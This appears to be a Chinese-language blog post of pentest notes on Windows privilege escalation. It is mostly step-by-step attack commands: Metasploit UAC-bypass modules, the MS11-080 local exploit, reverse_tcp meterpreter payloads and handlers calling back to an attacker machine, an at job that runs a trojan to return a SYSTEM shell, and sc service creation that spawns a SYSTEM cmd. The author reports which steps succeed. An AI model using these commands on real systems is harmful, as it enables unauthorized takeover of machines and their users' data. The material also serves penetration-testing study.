windows提权—msfatsc提权

Posted 2021-09-27 Thgilil

msf提权

适用版本：windows 2k3、xp

获取到服务器的 meterpreter 后，有三个方向

• getsystem提权

可以直接使用 getsystem 提权
没成功

• 绕过UAC策略

MSF使用注册表 bypass uac 提权
漏洞模块：

exploit/windows/local/ask
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection

操作：

use exploit/windows/local/ask
options
set session 4     //3被占用了
set TECHNIQUE EXE
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.109
set lport 4444
exploit

未成功

• 使用漏洞提权

meterpreter > run post/windows/gather/enum_patches

显示Q147222已被安装

复制到在线补丁对比平台

http://bugs.hacking8.com/tiquan/

或者使用getroot-tools 查看未打补丁
下载地址：

https://github.com/5z1punch/GetRoot-Tools

使用MS11-080

search MS11-080
use exploit/windows/local/ms11_080_afdjoinleaf
set session 4
exploit

at 命令提权

适用系统：Windows2000、Windows 2003、Windows XP
前提：获得服务器admin权限，可以使用at命令，由此提权为system权限

at 是一个发布定时任务计划的命令行工具，语法比较简单。通过 at 命令发布的
定时任务计划， Windows 默认以 SYSTEM 权限运行。定时任务计划可以是批处理、可以是一个二进制文件

提权操作
定时开启一个cmd的shell

##通过 /interactive 开启界面交互模式
at 16.40 /interactive "cmd.exe"

现在我们只是获得了一个system的shell，要把系统提权到system权限才行
在得到一个system的cmd之后，使用taskmgr命令调用任务管理器，此时的
任务管理器是system权限，然后kill掉explore进程，再使用任务管理器
新建explore进程，将会得到一个system的桌面环境

C:\\WINDOWS\\system32\\taskmgr

杀掉explore进程

再重新打开explorer进程

现在就是system权限了

MSF中at提权
思路：使用at命令执行木马反弹shell，攻击机上获得的shell时system权限

靶机：

at 17:34 /interactive "C:\\wmpub\\shell.exe"

kali

msf6>use exploit/multi/handler
msf6>set payload windows/meterpreter/reverse_tcp
msf6>set lhost 192.168.0.109
msf6>set lport 4444
msf6>exploit

提权成功

SC提权

适用版本（win7、8、08、12、16）
前提：获得服务器admin权限，可以使用at命令，由此提权为system权限

##CMD下

#配置一个服务syscmd
C:>sc Create syscmd binPath= “cmd /K start” type= own type= interact 
#启动服务获取system权限的cmd
C:>sc start syscmd 

其中syscmd是服务名称，可以随意填写，binpath是启动的命令，type=own是指服务这个服务属于谁，type=interact是指交互式shell

此时就以system权限打开了一个cmd，然后和at提权的后续做法相同，使用taskmgr命令调用任务管理器，此时的任务管理器是system权限，然后kill掉explore进程，再使用任务管理器新建explore进程，将会得到一个system的桌面环境